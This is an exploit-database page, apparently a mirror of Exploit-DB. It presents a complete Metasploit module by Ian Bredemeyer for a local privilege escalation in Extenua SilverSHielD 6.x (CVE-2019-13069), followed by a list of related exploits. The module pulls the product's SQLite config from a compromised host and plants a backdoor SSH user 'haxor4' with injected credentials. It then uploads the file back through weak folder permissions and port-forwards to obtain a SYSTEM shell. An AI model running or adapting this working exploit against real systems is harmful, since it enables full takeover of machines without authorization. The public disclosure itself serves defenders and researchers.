Menu

Search for hundreds of thousands of exploits

"SilverSHielD 6.x - Local Privilege Escalation"

Author

"Ian Bredemeyer"

Platform

multiple

Release date

2019-08-01

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit Title: extenua SilverSHielD 6.x local priviledge escalation
# Google Dork: na
# Date: 31 Jul 2019
# Exploit Author: Ian Bredemeyer
# Vendor Homepage: https://www.extenua.com
# Software Link: https://www.extenua.com/silvershield
# Version: 6.x
# Tested on: Windows7 x64, Windows7 x86, Windows Server 2012 x64, Windows10 x64, Windows Server 2016 x64
# CVE: CVE-2019-13069

# More Info: https://www.fobz.net/adv/ag47ex/info.html

require 'sqlite3'
require 'net/ssh'
require 'net/ssh/command_stream'
require 'tempfile'
require 'securerandom'
require 'digest'


class MetasploitModule < Msf::Exploit::Local
  Rank = GoodRanking

  include Post::File
  include Msf::Exploit::Remote::SSH
  include Msf::Post::Windows::Services
  include Msf::Post::Windows::FileInfo

  def initialize(info={})
    super( update_info(info,
      'Name'          => 'Extenua SilverSHielD 6.x local privilege escalation',
      'Description'   => %q{
        Extenua SilverShield 6.x fails to secure its ProgramData subfolder.
        This module exploits this by injecting a new user into the database and then
        using that user to login the SSH service and obtain SYSTEM. 
        This results in to FULL SYSTEM COMPROMISE. 
        At time of discolsure, no fix has been issued by vendor.
      },
      'Author'        => [
        'Ian Bredemeyer',
        ],
      'Platform'      => [ 'win','unix' ],  # 'unix' is needed, otherwise the Payload is flagged as incompatible
      'SessionTypes'  => [ 'meterpreter' ],
      'Targets'       => [
        [ 'Universal', {} ],
      ],
      'Payload'     =>
        {
          'Compat'  => {
            'PayloadType'    => 'cmd_interact',
            'ConnectionType' => 'find',
          },
        },
      'DefaultTarget' => 0,
      'References'    => [
        [ 'CVE', '2019-13069' ],
        [ 'URL', 'https://www.fobz.net/adv/ag47ex/info.html' ],
        [ 'URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13069' ]
      ],
      'DisclosureDate'=> "Jul 31 2019",
      'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
    ))

    register_options([
      OptPort.new('PF_PORT', [ true, 'Local port to PortFwd to victim', 20022 ]),
      OptString.new('SS_IP', [ false, 'IP address SilverShield is listening on at the victim. Leave blank to detect.', '' ]),
      OptPort.new('SS_PORT', [ false, 'Port SilverShield is listening on at the victim.  Leave at 0 to detect.', 0 ]),
      OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
      OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 15])
    ])
  end

  

  # Grabbed this bit from another exploit I was pulling apart... Need to trick the SSH session a bit
  module ItsAShell
    def _check_shell(*args)
      true
    end
  end
  
  
  
  # helper methods that normally come from Tcp
  def rhost
    return '127.0.0.1'
  end
  def rport
    datastore['PF_PORT']
  end

  

  # Does a basic check of SilverShield... Does not fail if there is a problem, but will return false
  def do_check_internal()
  
    looks_ok = true    # lets assume everything is OK...
  
    # Try to get the path of the SilverShield service...
    ss_serviceinfo = service_info("SilverShield")
    ss_servicepath = ss_serviceinfo[:path]
    if (ss_servicepath == '')
        print_warning("Vulnerable Silvershield service is likely NOT running on the target system")
        looks_ok = false
    else
        print_good("Silvershield service found: " + ss_servicepath)
    end


    # Try to read the version of Silvershield from the resigstry of the victim...
    ss_version = ""
    begin
      ss_version = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE\\extenua\\SilverShield', KEY_READ).query_value("Version").data
    rescue ::Exception => e
      print_warning "Cannot find SilverShield version in registry.  Victim may not have vulnerable SilverShield installed"
      looks_ok = false
    end
    if ss_version != ""
      print_good("Silvershield version from registry: " + ss_version)
      if ss_version[0..1] != "6."    # If not version "6." something ?  then this will not work...
        print_warning("This version is not likely vulnerable to this module")
        looks_ok = false
      end      
    end  
    return looks_ok
    
  end
  
 
  
  
  # Attempts a single SSH login to the victim via the local port forwarded to fictim.  Returns valid connection if OK
  def do_login()
    factory = Rex::Socket::SSHFactory.new(framework,self, datastore['Proxies'])
    opt_hash = {
      :auth_methods    => ['password'],
      :port            => rport,
      :use_agent       => false,
      :config          => false,
      :proxy           => factory,
      :password        => @@the_password,
      :non_interactive => true,
      :verify_host_key => :never
    }
    opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
    begin
      ssh_socket = nil
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
        ssh_socket = Net::SSH.start(rhost, 'haxor4', opt_hash)
      end
    rescue Rex::ConnectionError
      return
    rescue Net::SSH::Disconnect, ::EOFError
      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
      return
    rescue ::Timeout::Error
      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
      return
    rescue Net::SSH::AuthenticationFailed
      print_error "#{rhost}:#{rport} SSH - Failed authentication"
    rescue Net::SSH::Exception => e
      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
      return
    end

    if ssh_socket
      # Create a new session from the socket, then dump it.
      conn = Net::SSH::CommandStream.new(ssh_socket)
      ssh_socket = nil
      return conn
    else
      return false
    end
  end

  
  
  # Attempts several times to connect through session back to SilverShield as haxor then open resulting shell as a new session.
  def exploit_sub
    x = 0
    while x < 5 do 
        x = x + 1
        print_status "SSH login attempt " + x.to_s + ".  May take a moment..."

        conn = do_login()
        if conn
          print_good "Successful login.  Passing to handler..."
          handler(conn.lsock)
          return true
        end
    end     
    return false
  end


  
  def check()
    if do_check_internal
        Exploit::CheckCode::Appears
    else
        Exploit::CheckCode::Safe
    end
  end
  
  
  
  # The guts of it...
  def exploit
  
    # Some basic setup...
    payload_instance.extend(ItsAShell)
    factory = ssh_socket_factory
    
    
    # Do a quick check... well, sort of, just shows info.  We won't stop, just report to user...
    do_check_internal()
    
    
    # We will generate a NEW password and salt.  Then get the relevant hash to inject...
    @@the_password = SecureRandom.hex
    @@the_password_salt = SecureRandom.hex[0..7]
    @@the_password_hash = Digest::MD5.hexdigest @@the_password_salt + @@the_password
    vprint_status("generated- user:haxor4  password:" + @@the_password + " salt:" + @@the_password_salt + " => hash(md5):" + @@the_password_hash)


    # Get a tempfile on the local system.  Garbage collection will automaticlly kill it off later...
    # This is a temp location where we will put the sqlite database so we can work on it on the local machine...
    tfilehandle = Tempfile.new('ss.db.')
    tfilehandle.close
    wfile = tfilehandle.path


    #Try to get the ProgramData path from the victim, this is where the SQLite databasae is held...
    progdata = session.fs.file.expand_path("%ProgramData%")    # client.sys.config.getenv('PROGRAMDATA')
    print_status 'Remote %ProgramData% = ' + progdata


    # Lets check the file exists, then download from the victim to the local file system...
    filecheck = progdata + '\SilverShield\SilverShield.config.sqlite'
    fsrc = filecheck
    fdes = wfile  
    print_status 'Try download: ' + fsrc + '  to: ' + fdes
    begin
      ::Timeout.timeout(5) do
            session.fs.file.download_file(fdes, fsrc)
      end
    rescue ::Exception => e
      print_error "Cannot download #{fsrc} to #{fdes}  #{e.class} : #{e.message}"
      print_error "Does victim even have vulnerable SilverShield installed ?"
      fail_with(Failure::Unknown, "Fail download")
    end


    # Try to connect with sqlite locally...
    vprint_status 'Trying to open database ' + wfile
    db = SQLite3::Database.open wfile


    # Remove haxor4 if its already there, just incase by pure chance a user with that name already exists...
    vprint_status 'remove user "haxor4" if its already in there...'
    results = db.execute "delete from USERS where vcusername='haxor4'"
    answer = ""
    results.each { |row| answer = answer + row.join(',') }


    # Insert the haxor user... we will use this later to connect back in as SYSTEM
    vprint_status 'insert user "haxor4" with password "' + @@the_password + '" into database'
    results = db.execute "INSERT INTO USERS (CUSERID, VCUSERNAME, CSALT,CPASSWORD, VCHOMEDIR, BGETFILE, BPUTFILE, BDELFILE, BMODFILE, BRENFILE, BLISTDIR, BMAKEDIR, BDELDIR, BRENDIR, IAUTHTYPES, BAUTHALL, BALLOWSSH, BALLOWSFTP, BALLOWFWD, BALLOWDAV, IACCOUNTSTATUS, BAUTODISABLE, DTAUTODISABLE, BWINPASSWD, BISADMIN)VALUES(\"{11112222-3333-4444-5555666677778888}\",\"haxor4\",\"" + @@the_password_salt + "\",\"" + @@the_password_hash + "\",\"c:\\\",1,1,1,1,1,1,1,1,1,20,0,1,0,0,0,0,0,-700000.0, 0, 1);"
    answer = ""
    results.each { |row| answer = answer + row.join(',') }
    print_good 'user inserted OK'


    # Dump out local port that SilverShield has been configured to listen on at the victim machine...
    results = db.execute "select IPORT from maincfg"
    answer = ""
    results.each { |row| answer = answer + row.join(',') }
    ss_port = answer
    print_status "SilverShield config shows listening on port: " + ss_port
    if (datastore['SS_PORT'] != 0) 
        ss_port = datastore['SS_PORT'].to_s
        print_status "SS_PORT setting forcing port to " + ss_port
    end
    if (ss_port == '')
        ss_port = '22'
    end


    # Dump out local IP that SilverShield has been configured to listen on at the victim machine...
    results = db.execute "select CBINDIP from maincfg"
    answer = ""
    results.each { |row| answer = answer + row.join(',') }
    ss_ip = answer
    print_status "SilverShield config shows listening on local IP: " + ss_ip
    if (datastore['SS_IP'] != '') 
        ss_ip = datastore['SS_IP']
        print_status "SS_IP setting forcing IP to " + ss_ip
    end
    # If the override AND the detection have come up with nothing, then use the default 127.0.0.1
    if (ss_ip == '') 
        ss_ip = '127.0.0.1'
    end


    # Close the database. Keep it neat
    db.close


    # Now lets upload this file back to the victim...due to bad folder permissions, we can sneak our bad config back in.  Yay
    fdes = filecheck  
    fsrc = wfile
    print_status 'Sending modded file back to victim' 
    begin
      ::Timeout.timeout(5) do
            session.fs.file.upload_file(fdes, fsrc)
      end
    rescue ::Exception => e
      print_error "Cannot upload #{fsrc} to #{fdes}  #{e.class} : #{e.message}"
      print_error "Perhaps this server is not vulnerable or has some other mitigation."
      fail_with(Failure::Unknown, "Fail upload")
    end
    sleep 4   # wait a few seconds... this gives the SilverShield service some time to see the settings have changed.


    # Delete the port if its already pointing somewhwere...  This a bit ugly and may generate an error, but I don't care.
    client.run_cmd("portfwd delete -l " + datastore['PF_PORT'].to_s)


    # Forward a local port through to the ssh port on the victim. 
    client.run_cmd("portfwd add -l " + datastore['PF_PORT'].to_s + " -p " + ss_port + " -r " + ss_ip)


    # Now do ssh work and hand off the session to the handler...
    exploit_sub

  end 

end
Release Date Title Type Platform Author
2019-09-09 "Enigma NMS 65.0.0 - SQL Injection" webapps multiple mark
2019-09-09 "Enigma NMS 65.0.0 - OS Command Injection" webapps multiple mark
2019-09-09 "Enigma NMS 65.0.0 - Cross-Site Request Forgery" webapps multiple mark
2019-09-06 "Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Remote Code Execution" remote multiple "Justin Wagner"
2019-09-02 "Alkacon OpenCMS 10.5.x - Local File inclusion" webapps multiple Aetsu
2019-09-02 "Alkacon OpenCMS 10.5.x - Cross-Site Scripting (2)" webapps multiple Aetsu
2019-09-02 "Alkacon OpenCMS 10.5.x - Cross-Site Scripting" webapps multiple Aetsu
2019-08-29 "Webkit JSC: JIT - Uninitialized Variable Access in ArgumentsEliminationPhase::transform" dos multiple "Google Security Research"
2019-08-21 "Cisco UCS Director_ Cisco Integrated Management Controller Supervisor and Cisco UCS Director Express for Big Data - Multiple Vulnerabilities" remote multiple "Pedro Ribeiro"
2019-08-27 "Tableau - XML External Entity" webapps multiple "Jarad Kopf"
2019-08-23 "Nimble Streamer 3.0.2-2 < 3.5.4-9 - Directory Traversal" webapps multiple MaYaSeVeN
2019-08-21 "Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Arbitrary File Disclosure (Metasploit)" webapps multiple "Alyssa Herrera"
2019-08-21 "LibreOffice < 6.2.6 Macro - Python Code Execution (Metasploit)" remote multiple LoadLow
2019-08-01 "SilverSHielD 6.x - Local Privilege Escalation" local multiple "Ian Bredemeyer"
2019-08-15 "NSKeyedUnarchiver - Info Leak in Decoding SGBigUTF8String" dos multiple "Google Security Research"
2019-08-12 "ManageEngine OpManager 12.4x - Unauthenticated Remote Command Execution (Metasploit)" remote multiple AkkuS
2019-08-12 "ManageEngine Application Manager 14.2 - Privilege Escalation / Remote Command Execution (Metasploit)" remote multiple AkkuS
2019-08-12 "ManageEngine OpManager 12.4x - Privilege Escalation / Remote Command Execution (Metasploit)" remote multiple AkkuS
2019-08-12 "WebKit - UXSS via XSLT and Nested Document Replacements" dos multiple "Google Security Research"
2019-08-08 "Aptana Jaxer 1.0.3.4547 - Local File inclusion" webapps multiple "Steph Jensen"
2019-08-07 "Google Chrome 74.0.3729.0 / 76.0.3789.0 - Heap Use-After-Free in blink::PresentationAvailabilityState::UpdateAvailability" dos multiple "Google Security Research"
2019-08-05 "ARMBot Botnet - Arbitrary Code Execution" remote multiple prsecurity
2019-08-01 "Ultimate Loan Manager 2.0 - Cross-Site Scripting" webapps multiple "Metin Yunus Kandemir"
2019-07-31 "Oracle Hyperion Planning 11.1.2.3 - XML External Entity" webapps multiple "Lucas Dinucci"
2019-07-30 "iMessage - NSKeyedUnarchiver Deserialization Allows file Backed NSData Objects" dos multiple "Google Security Research"
2019-07-30 "iMessage - Memory Corruption when Decoding NSKnownKeysDictionary1" dos multiple "Google Security Research"
2019-07-30 "iMessage - NSArray Deserialization can Invoke Subclass that does not Retain References" dos multiple "Google Security Research"
2019-07-30 "macOS / iOS JavaScriptCore - JSValue Use-After-Free in ValueProfiles" dos multiple "Google Security Research"
2019-07-30 "macOS / iOS JavaScriptCore - Loop-Invariant Code Motion (LICM) Leaves Object Property Access Unguarded" dos multiple "Google Security Research"
2019-07-30 "macOS / iOS NSKeyedUnarchiver - Use-After-Free of ObjC Objects when Unarchiving OITSUIntDictionary Instances" dos multiple "Google Security Research"
Release Date Title Type Platform Author
2019-08-01 "SilverSHielD 6.x - Local Privilege Escalation" local multiple "Ian Bredemeyer"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47197/?format=json')
                        {"url": "https://www.nmmapper.com/api/exploitdetails/47197/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/47197/41661/silvershield-6x-local-privilege-escalation/download/", "exploit_id": "47197", "exploit_description": "\"SilverSHielD 6.x - Local Privilege Escalation\"", "exploit_date": "2019-08-01", "exploit_author": "\"Ian Bredemeyer\"", "exploit_type": "local", "exploit_platform": "multiple", "exploit_port": null}
                    

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Wig is a web application information gathering tool, which can identify numerous Content Management Systems and other administrative applications including basic vulnerability identification.

Browse exploit APIBrowse